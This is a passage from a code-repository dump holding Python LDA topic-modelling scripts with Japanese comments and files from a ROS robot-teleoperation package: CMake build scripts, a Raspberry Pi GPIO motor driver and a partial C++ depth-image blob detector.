"text": "# -*- coding:utf-8 -*-\n\nfrom gensim import corpora, models, similarities\ncorpus = corpora.BleiCorpus('.\\/ap\\/ap.dat', '.\\/ap\\/vocab.txt')\n\nu'''トピックモデルの作成'''\nmodel = models.ldamodel.LdaModel(corpus, num_topics=100, id2word=corpus.id2word)\ntopics = [model[c] for c in corpus]\n\nu'''トピックを構成する単語と確率'''\nfor topic in model.show_topics(-1):\n print topic\n\nu'''トピックの出現回数を表した配列'''\nimport numpy as np\ncounts = np.zeros(100)\nfor doc_top in topics:\n for ti, _ in doc_top:\n counts[ti] += 1\n\nu'''トピックの中で出現する単語とその確率のリスト'''\nu'''最も出現するトピック'''\nwords = model.show_topic(counts.argmax(), 64)\nu'''最も書かれることが少ないトピック'''\n#words = model.show_topic(counts.argmin(), 64)\n\nu'''最も出現確率の高いトピックの可視化'''\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nwordclod = WordCloud().generate_from_frequencies(words)\nplt.imshow(wordclod)\nplt.axis(\"off\")\nplt.show()"
},
{
"alpha_fraction": 0.650040864944458,
"alphanum_fraction": 0.6835650205612183,
"avg_line_length": 27.465116500854492,
"blob_id": "6251b3458bf66fe3a94e8b38bfe48ab585662abb",
"content_id": "f6d6874db5ccd573ad261d9276810259481536a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1343,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 43,
"path": "/histgram.py",
"repo_name": "Ihmana/machine_ch4",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n\nfrom gensim import corpora, models, similarities\ncorpus = corpora.BleiCorpus('.\\/ap\\/ap.dat', '.\\/ap\\/vocab.txt')\n\nu'''トピックモデルの作成'''\nmodel = models.ldamodel.LdaModel(corpus, num_topics=100, id2word=corpus.id2word)\n\ntopics = [model[c] for c in corpus]\nprint topics[0]\n\nu'''各文書のトピック数のリスト'''\ntopic_len = []\nfor i in range(len(topics)):\n topic_len.append(len(topics[i]))\n\n# import numpy as np\n# lens = np.array([len(t) for t in topics])\n\nu'''alphaの値がそのままでヒストグラムを出力'''\nimport matplotlib.pyplot as plt\n\nplt.hist(topic_len, bins=20)\nplt.title(\"Histgram\")\nplt.xlabel(\"number of topics\")\nplt.ylabel(\"number of documents\")\nplt.show()\n\n# u'''alpha=1にしてヒストグラムを標準のものと比較する'''\n# model2 = models.ldamodel.LdaModel(corpus, num_topics=100, id2word=corpus.id2word, alpha=1)\n# topics2 = [model2[c] for c in corpus]\n#\n# topic2_len = []\n# for i in range(len(topics2)):\n# topic2_len.append(len(topics2[i]))\n#\n# plt.hist(topic_len, label=\"default alpha\", bins=20, range=(-10, 40), alpha=0.5, color=\"blue\")\n# plt.hist(topic2_len, label=\"alpha=1\", bins=20, range=(-10, 40), alpha=0.5, color=\"red\")\n# plt.legend()\n# plt.title(\"Histgram\")\n# plt.xlabel(\"number of topics\")\n# plt.ylabel(\"number of documents\")\n# plt.show()"
},
{
"alpha_fraction": 0.6661807298660278,
"alphanum_fraction": 0.680757999420166,
"avg_line_length": 25.423076629638672,
"blob_id": "390dde03870fc1125768b71d081d32a0fcf7ed23",
"content_id": "1436a98251185b627ce3a90585fd15a0229ae1df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 734,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 26,
"path": "/comparison.py",
"repo_name": "Ihmana/machine_ch4",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n\nfrom gensim import corpora, models, similarities\ncorpus = corpora.BleiCorpus('.\\/ap\\/ap.dat', '.\\/ap\\/vocab.txt')\n\nu'''モデルの作成'''\nmodel = models.ldamodel.LdaModel(corpus, num_topics=100, id2word=corpus.id2word)\ntopics = [model[c] for c in corpus]\n\nu'''トピックベクトルの作成'''\nimport numpy as np\ndense = np.zeros((len(topics), 100), float)\nfor ti,t in enumerate(topics):\n for tj, v in t:\n dense[ti, tj] = v\n\nu'''距離行列の作成'''\nfrom scipy.spatial import distance\npairwise = distance.squareform(distance.pdist(dense))\n\nlargest = pairwise.max()\nfor ti in range(len(topics)):\n pairwise[ti, ti] = largest + 1\n\ndef closet_to(doc_id):\n return pairwise[doc_id].argmin()"
}
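`comparison.py` masks the distance matrix's diagonal with `largest + 1` precisely so that `argmin` never returns the query document itself. A self-contained toy run of that trick:

```python
import numpy as np

# Toy 3x3 distance matrix standing in for the pdist/squareform result above.
pairwise = np.array([[0.0, 0.3, 0.8],
                     [0.3, 0.0, 0.5],
                     [0.8, 0.5, 0.0]])

# Mask the diagonal the same way comparison.py does.
largest = pairwise.max()
np.fill_diagonal(pairwise, largest + 1)

def closest_to(doc_id):
    return pairwise[doc_id].argmin()

print(closest_to(0))  # -> 1: document 1 is the nearest neighbor of document 0
```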
] | 3 |
DoubleWB/old_ros | https://github.com/DoubleWB/old_ros | e70f609a82a46d520febb887fe49a4de88015cbc | 89d9c7b034b478c49d892ed891d70b11b94cf734 | 1daf1579cf35373beaa18b4bb02fe33feee86cd7 | refs/heads/master | 2020-03-29T10:04:44.731732 | 2018-09-21T16:21:06 | 2018-09-21T16:21:06 | 149,788,543 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7783375382423401,
"alphanum_fraction": 0.7783375382423401,
"avg_line_length": 38.70000076293945,
"blob_id": "01002a1e514a9e1108d7628628ed6a08ba42031d",
"content_id": "76c072a04e9b926477eb0549be9e3aa2bfc1ebdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 10,
"path": "/build/basic_teleop/CMakeFiles/basic_teleop_node.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/basic_teleop_node.dir/src/depth_stream_stabilizer.cpp.o\"\n \"/home/will/catkin_ws/devel/lib/basic_teleop/basic_teleop_node.pdb\"\n \"/home/will/catkin_ws/devel/lib/basic_teleop/basic_teleop_node\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang CXX)\n INCLUDE(CMakeFiles/basic_teleop_node.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.6350710988044739,
"alphanum_fraction": 0.7203791737556458,
"avg_line_length": 20,
"blob_id": "a1b7c759fb745d78bcb934ff5b2cc4c52e850a75",
"content_id": "672c319b87bfe49a7c1460451167cc871904a19c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 10,
"path": "/src/basic_teleop/misc/pi_ros_setup.bash",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "#!/bin/bash \nsudo chown root.gpio /dev/gpiomem\nsudo chmod g+rw /dev/gpiomem\ncd ~/tobot_ws/catkin_ws2\ncatkin_make\ncd devel\n. setup.bash\nexport ROS_MASTER_URI=http://10.0.0.52:11311/\nexport ROS_IP=10.0.0.49\ncd ~\n\n"
},
{
"alpha_fraction": 0.7950000166893005,
"alphanum_fraction": 0.7950000166893005,
"avg_line_length": 49,
"blob_id": "978b099b4a82a9c5e479cc1edb8b05ffef8c7d4b",
"content_id": "43e94ce296c7d2a369abc621ab2e64509c5198b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 200,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 4,
"path": "/devel/share/basic_teleop/cmake/basic_teleop-msg-paths.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(basic_teleop_MSG_INCLUDE_DIRS \"/home/will/catkin_ws/src/basic_teleop/msg\")\nset(basic_teleop_MSG_DEPENDENCIES std_msgs;sensor_msgs)\n"
},
{
"alpha_fraction": 0.7884615659713745,
"alphanum_fraction": 0.7884615659713745,
"avg_line_length": 33.66666793823242,
"blob_id": "6af1abfca8f2574b44f4c940755cbf5ee944e62d",
"content_id": "cf0a395e319bdcad9e98a5a08a0ce8f3ba94e940",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 312,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 9,
"path": "/build/basic_teleop/CMakeFiles/basic_teleop_generate_messages_cpp.dir/cmake_clean.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "FILE(REMOVE_RECURSE\n \"CMakeFiles/basic_teleop_generate_messages_cpp\"\n \"/home/will/catkin_ws/devel/include/basic_teleop/Move.h\"\n)\n\n# Per-language clean rules from dependency scanning.\nFOREACH(lang)\n INCLUDE(CMakeFiles/basic_teleop_generate_messages_cpp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nENDFOREACH(lang)\n"
},
{
"alpha_fraction": 0.7691240310668945,
"alphanum_fraction": 0.7709076404571533,
"avg_line_length": 62.0625,
"blob_id": "8024fab60d32beebe9f903b3994c56607bdeffb3",
"content_id": "09a7b864eb532e5bd71a60c223f52ad48f5c46c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 5046,
"license_type": "no_license",
"max_line_length": 196,
"num_lines": 80,
"path": "/build/basic_teleop/cmake_install.cmake",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# Install script for directory: /home/will/catkin_ws/src/basic_teleop\n\n# Set the install prefix\nIF(NOT DEFINED CMAKE_INSTALL_PREFIX)\n SET(CMAKE_INSTALL_PREFIX \"/home/will/catkin_ws/install\")\nENDIF(NOT DEFINED CMAKE_INSTALL_PREFIX)\nSTRING(REGEX REPLACE \"/$\" \"\" CMAKE_INSTALL_PREFIX \"${CMAKE_INSTALL_PREFIX}\")\n\n# Set the install configuration name.\nIF(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME)\n IF(BUILD_TYPE)\n STRING(REGEX REPLACE \"^[^A-Za-z0-9_]+\" \"\"\n CMAKE_INSTALL_CONFIG_NAME \"${BUILD_TYPE}\")\n ELSE(BUILD_TYPE)\n SET(CMAKE_INSTALL_CONFIG_NAME \"\")\n ENDIF(BUILD_TYPE)\n MESSAGE(STATUS \"Install configuration: \\\"${CMAKE_INSTALL_CONFIG_NAME}\\\"\")\nENDIF(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME)\n\n# Set the component getting installed.\nIF(NOT CMAKE_INSTALL_COMPONENT)\n IF(COMPONENT)\n MESSAGE(STATUS \"Install component: \\\"${COMPONENT}\\\"\")\n SET(CMAKE_INSTALL_COMPONENT \"${COMPONENT}\")\n ELSE(COMPONENT)\n SET(CMAKE_INSTALL_COMPONENT)\n ENDIF(COMPONENT)\nENDIF(NOT CMAKE_INSTALL_COMPONENT)\n\n# Install shared libraries without execute permission?\nIF(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE)\n SET(CMAKE_INSTALL_SO_NO_EXE \"1\")\nENDIF(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE)\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop/msg\" TYPE FILE FILES \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop/cmake\" TYPE FILE FILES \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleop-msg-paths.cmake\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/include\" TYPE DIRECTORY FILES \"/home/will/catkin_ws/devel/include/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/roseus/ros\" TYPE DIRECTORY FILES \"/home/will/catkin_ws/devel/share/roseus/ros/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/common-lisp/ros\" TYPE DIRECTORY FILES \"/home/will/catkin_ws/devel/share/common-lisp/ros/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n execute_process(COMMAND \"/usr/bin/python\" -m compileall \"/home/will/catkin_ws/devel/lib/python2.7/dist-packages/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/python2.7/dist-packages\" TYPE DIRECTORY FILES 
\"/home/will/catkin_ws/devel/lib/python2.7/dist-packages/basic_teleop\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/pkgconfig\" TYPE FILE FILES \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleop.pc\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop/cmake\" TYPE FILE FILES \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleop-msg-extras.cmake\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop/cmake\" TYPE FILE FILES\n \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleopConfig.cmake\"\n \"/home/will/catkin_ws/build/basic_teleop/catkin_generated/installspace/basic_teleopConfig-version.cmake\"\n )\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\nIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n FILE(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/basic_teleop\" TYPE FILE FILES \"/home/will/catkin_ws/src/basic_teleop/package.xml\")\nENDIF(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n\n"
},
{
"alpha_fraction": 0.6219292879104614,
"alphanum_fraction": 0.6512882113456726,
"avg_line_length": 27.288135528564453,
"blob_id": "10f4f8e912b6d092e166aefb244a0deb0f95500d",
"content_id": "a3034283ac5eb1fa867a3f4c65151f7f245b0c94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1669,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 59,
"path": "/src/basic_teleop/scripts/teleop.py",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport rospy\nimport time\nimport RPi.GPIO as GPIO\n\nfrom std_msgs.msg import String\nfrom basic_teleop.msg import *\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(17,GPIO.OUT)\nGPIO.setup(18,GPIO.OUT)\nGPIO.setup(22,GPIO.OUT)\nGPIO.setup(23,GPIO.OUT)\n\ndef callback(data):\n rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", data.direction)\n if data.direction == \"bwd\":\n\tGPIO.output(17, True)\n \tGPIO.output(18, False)\n\tGPIO.output(22, False)\n\tGPIO.output(23, True)\n elif data.direction == \"fwd\":\n GPIO.output(17, False)\n GPIO.output(18, True)\n GPIO.output(22, True)\n GPIO.output(23, False)\n elif data.direction == \"cw\":\n GPIO.output(17, False)\n GPIO.output(18, True)\n GPIO.output(22, False)\n GPIO.output(23, True)\n elif data.direction == \"ccw\":\n GPIO.output(17, True)\n GPIO.output(18, False)\n GPIO.output(22, True)\n GPIO.output(23, False)\n time.sleep(data.duration/2)\n GPIO.output(17, False)\n GPIO.output(18, False)\n GPIO.output(22, False)\n GPIO.output(23, False)\n\n \ndef listener():\n # In ROS, nodes are uniquely named. If two nodes with the same\n # node are launched, the previous one is kicked off. The\n # anonymous=True flag means that rospy will choose a unique\n # name for our 'listener' node so that multiple listeners can\n # run simultaneously.\n rospy.init_node('driver', anonymous=True)\n\n rospy.Subscriber(\"movement\", Move, callback)\n print \"ready to hear\"\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\nif __name__ == '__main__':\n listener()\n"
},
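`teleop.py` reads `data.direction` and `data.duration` from the `movement` topic, so the `Move` message presumably carries those two fields (the `.msg` definition itself is not included in this dump). Below is a minimal publisher counterpart, with the field names and types inferred from the callback.

```python
#!/usr/bin/env python
# Minimal publisher counterpart to the listener above. Field names/types are
# inferred from the callback; verify against msg/Move.msg before relying on them.
import rospy
from basic_teleop.msg import Move

def drive():
    pub = rospy.Publisher('movement', Move, queue_size=10)
    rospy.init_node('commander', anonymous=True)
    rospy.sleep(1.0)            # let the subscriber connection establish
    msg = Move()
    msg.direction = 'fwd'       # one of: fwd, bwd, cw, ccw
    msg.duration = 2.0          # seconds; the driver sleeps duration/2
    pub.publish(msg)

if __name__ == '__main__':
    drive()
```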
{
"alpha_fraction": 0.5221611857414246,
"alphanum_fraction": 0.5463816523551941,
"avg_line_length": 30.819032669067383,
"blob_id": "16939d1f9197974acc679373d90f0fff70f8fbd0",
"content_id": "b3ff8cba77d1ee3c566446afd5cd95d2e87e79da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 20396,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 641,
"path": "/src/basic_teleop/src/predictive_director.cpp",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "//Imports\n#include \"ros/ros.h\"\n#include \"std_msgs/String.h\"\n#include <sensor_msgs/Image.h>\n#include <sstream>\n#include \"basic_teleop/Move.h\"\n#include \"limits.h\"\n#include <typeinfo>\n#include \"sensor_msgs/CameraInfo.h\"\n#include <cmath>\n#include <boost/date_time.hpp>\n#include <boost/lexical_cast.hpp>\n#include <array>\n#include <vector>\n#include <algorithm>\n#include <fstream>\n#include <iostream>\n#include <stdlib.h>\n\n//Constants\n#define WIDTH 320\n#define HEIGHT 240\n#define PRINT_NAME(x) std::cout << #x << \" - \" << typeid(x).name() << '\\n' // For Debugging\n#define DEGREES_PER_SECOND 90\n#define X_SHIFT .16\n#define BLOB_TOLERANCE 15\n#define BLOB_MIN_SIZE 25\n#define HORIZON 138\n\n//Namespaces\nnamespace btt = boost::posix_time;\n\n\n//Types and Classes\nunion depth_data { //For processing data as mm values\n unsigned char raw[WIDTH * HEIGHT * 2]; //uint8 counterpart\n unsigned short int mm[WIDTH * HEIGHT]; //unit16 counterpart\n};\n\nclass point2d {\n public:\n point2d(int x, int y) : x(x), y(y) {};\n int x;\n int y;\n};\n\nclass point2dDepth {\n public:\n point2dDepth() : x(0), y(0), depth(0.0) {};\n point2dDepth(int x, int y, double d) : x(x), y(y), depth(d) {};\n int x;\n int y;\n double depth;\n inline bool operator == (const point2dDepth &other) {\n //ROS_INFO(\"Point Comparison: %d %d %d %d\", x, y, other.x, other.y);\n //ROS_INFO(\"Val: %d\", (x == other.x) && (y == other.y));\n return (x == other.x) && (y == other.y);\n }\n};\n\nclass point3d {\n public:\n point3d(double x, double y, double z) : x(x), y(y), z(z) {};\n double x;\n double y;\n double z;\n};\n\ntemplate<class T>\nclass Blob {\n public:\n Blob() : including() {};\n Blob(T point) {\n including = { point };\n } \n Blob(std::vector<T> i) : including(i) {};\n int getArea() {return 0;};\n std::array<int, 2> getCenter() {return std::array<int, 2> { {0, 0} }; };\n bool inBlob(T point) {\n for(int i = 0; i < including.size(); i++) { //Switch to more efficient search later\n if (including[i] == point) {\n return true;\n }\n }\n return false;\n }\n bool isEmpty() {\n return including.size() == 0; \n }\n int numMembers() {\n return including.size();\n }\n void addPoint(T point) {\n including.push_back(point);\n }\n private:\n std::vector<T> including;\n};\n\n//Globals\nsensor_msgs::CameraInfo camera;\nbasic_teleop::Move last_dir;\nBlob<point2dDepth> last_blob;\nstd::array<float, 3> last_untransformed;\nstd::array<float, 3> velocity; // m/s\nbtt::ptime last_time = btt::microsec_clock::universal_time();\nbool received_first = false;\nbool received_2 = false;\nbool calibrate_lag = false;\ndepth_data d;\n\n//Protofunctions\ndepth_data smoothFrame(const depth_data&);\nshort int average_pixel(const depth_data&, int, int);\nvoid sort_into_by_depth(std::vector<point2dDepth>*, point2dDepth);\nstd::vector<point2dDepth> get_higher_neighbors(const point2dDepth&, const depth_data&);\nint decide_lindeberg_case(point2dDepth, const std::vector<point2dDepth>&, std::vector<point2dDepth>*, std::vector<Blob<point2dDepth>>);\nint getXY(const depth_data&, int, int);\npoint2dDepth getXY(const depth_data&, point2d);\nvoid print_closest_point_pixel_coords(const depth_data&);\nstd::array<float, 3> conv_to_3d(const depth_data&, int, int, const double*);\nstd::array<int, 2> conv_to_2d(const std::array<float, 3>, const double*);\nvoid change_velocity(const std::array<float, 3>);\n\n//Class Member Definitions\n\n\n//Helper Definitions\n\ndepth_data smoothFrame(const depth_data& frame) {\n depth_data smoothed;\n for(int 
x = 0; x < WIDTH; x++) {\n for(int y = 0; y < HEIGHT; y++) {\n smoothed.mm[x + (y * WIDTH)] = average_pixel(frame, x, y);\n }\n }\n return smoothed;\n}\n\nshort int average_pixel(const depth_data& frame, int x, int y) {\n short int averaged = (( getXY(frame, x + 1, y)\n + getXY(frame, x + 1, y + 1)\n + getXY(frame, x + 1, y - 1)\n + getXY(frame, x, y)\n + getXY(frame, x, y + 1)\n + getXY(frame, x, y - 1)\n + getXY(frame, x - 1, y)\n + getXY(frame, x - 1, y + 1)\n + getXY(frame, x - 1, y - 1)) / 9);\n if (averaged > 0) {\n ROS_INFO(\"Found nonzero average %d, %d: %d\", x, y, averaged);\n }\n return averaged;\n}\n\nstd::vector<Blob<point2dDepth>> blobFrame(const depth_data& frame) {\n std::vector<Blob<point2dDepth>> output;\n\n depth_data sFrame = smoothFrame(frame); \n \n ROS_INFO(\"Checking depth on smoothed frame: %d\", getXY(sFrame, 280, 1));\n\n \n //transform grid to pixel array - ignore things below the horizon\n std::vector<point2dDepth> sorted;\n for (int x = 0; x < WIDTH; x++) {\n for (int y = 0; y < HORIZON; y++) {\n sort_into_by_depth(&sorted, getXY(sFrame, point2d(x, y)));\n }\n }\n\n /*for (int k = 0; k < sorted.size(); k++) {\n if (sorted[k].depth < 0.1) {\n ROS_INFO(\"Pixel #%d: %d, %d depth: %f\", k, sorted[k].x, sorted[k].y, sorted[k].depth);\n while(true) {};\n } \n }*/\n\n //while(true) {}; // halt program\n\n //sort pixels into blobs + background\n\n int counter = 0;\n std::vector<point2dDepth> background;\n for (int i = 0; i < sorted.size(); i++) {\n point2dDepth p = sorted[i];\n std::vector<point2dDepth> neighbors = get_higher_neighbors(p, sFrame);\n //ROS_INFO(\"[%d, %d]\", p.x, p.y); \n if(neighbors.size() == 0) {\n point2dDepth plateau_check = sorted[i-1];\n if (p.depth != 0 && p.depth >= plateau_check.depth - .000001 && p.depth <= plateau_check.depth + .000001 && // actually I hate doubles\n plateau_check.x <= p.x + 1 &&\n plateau_check.x >= p.x - 1 &&\n plateau_check.y <= p.y + 1 &&\n plateau_check.y >= p.y - 1) { //deal with edge case of equal height neighbors\n ROS_INFO(\"Pleateau case found (%d, %d, %f), blobs found %d\", plateau_check.x, plateau_check.y, plateau_check.depth, output.size());\n //ROS_INFO(\"Test: %d\", plateau_check.x, plateau_check.y, plateau_check.depth, output.size());\n for (Blob<point2dDepth> b : output) {\n if (b.inBlob(plateau_check)) {\n b.addPoint(p);\n ROS_INFO(\"Found Blob For Point with %d members\", b.numMembers());\n //while (true) {} ;\n break;\n } \n }\n continue;\n } \n \n if(output.size() >= 9) {\n background.push_back(p);\n continue; \n }\n output.push_back(Blob<point2dDepth>(p));\n }\n //else if(p.depth > 1.0) {\n // background.push_back\n //}\n else {\n decide_lindeberg_case(p, neighbors, &background, output);\n }\n counter++;\n //ROS_INFO(\"[Classified: %d]\", counter); \n }\n \n //sort blobs by closeness/size?\n\n //return blobs sorted by closeness/size?\n ROS_INFO(\"Pixel 0, 0 depth: %d\", getXY(sFrame, 0, 0));\n ROS_INFO(\"Pixel 1, 0 depth: %d\", getXY(sFrame, 1, 0));\n ROS_INFO(\"Pixel 2, 0 depth: %d\", getXY(sFrame, 2, 0));\n return output;\n}\n\nvoid sort_into_by_depth(std::vector<point2dDepth>* v, point2dDepth p) { //given that V is sorted\n for(int i = 0; i < v->size(); i++) {\n //ROS_INFO(\"[Depth: %f]\", p.depth);\n if (p.depth > 0.2 && (p.depth <= v->at(i).depth || v->at(i).depth == 0) ) {//20cm is below the tolerance of the sensor, and if you've hit the zeros you should stop\n v->insert(v->begin() + i, p);\n return;\n }\n }\n if(p.depth > 0){\n ROS_INFO(\"[Mid Sorted Number: %d]\", v->size());\n }\n 
v->push_back(p);\n}\n\nstd::vector<point2dDepth> get_higher_neighbors(const point2dDepth& p, const depth_data& frame) {\n std::vector<point2dDepth> output;\n point2dDepth temp;\n \n temp = getXY(frame, point2d(p.x + 1, p.y));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x + 1, p.y + 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x + 1, p.y - 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n } \n \n temp = getXY(frame, point2d(p.x, p.y + 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x, p.y - 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x - 1, p.y));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x - 1, p.y + 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n\n temp = getXY(frame, point2d(p.x - 1, p.y - 1));\n if (temp.depth != 0 && temp.depth < p.depth) {\n output.push_back(temp);\n }\n \n if (p.depth > 0) {\n ROS_INFO(\"Found nonzero point %d, %d, %f\", p.x, p.y, p.depth);\n ROS_INFO(\"Neighbornum: %d\", output.size());\n //while(true){}; //Next step is how to solve edge case of equal neighbors\n }\n return output;\n}\n\nint decide_lindeberg_case(point2dDepth point, const std::vector<point2dDepth>& neighbors, std::vector<point2dDepth>* background, std::vector<Blob<point2dDepth>> blobs) {\n Blob<point2dDepth>* potentialBlob;\n //ROS_INFO(\"[Neighbor Number: %d]\", neighbors.size());\n //ROS_INFO(\"[Background Number: %d]\", background->size());\n //ROS_INFO(\"[Blob Number: %d]\", blobs.size()); \n for(point2dDepth neighbor : neighbors) {\n \n if(std::find(background->begin(), background->end(), neighbor) != background->end()) {\n background->push_back(point); // is pushing back better o(n) than putting to the front for searching in the background?? 
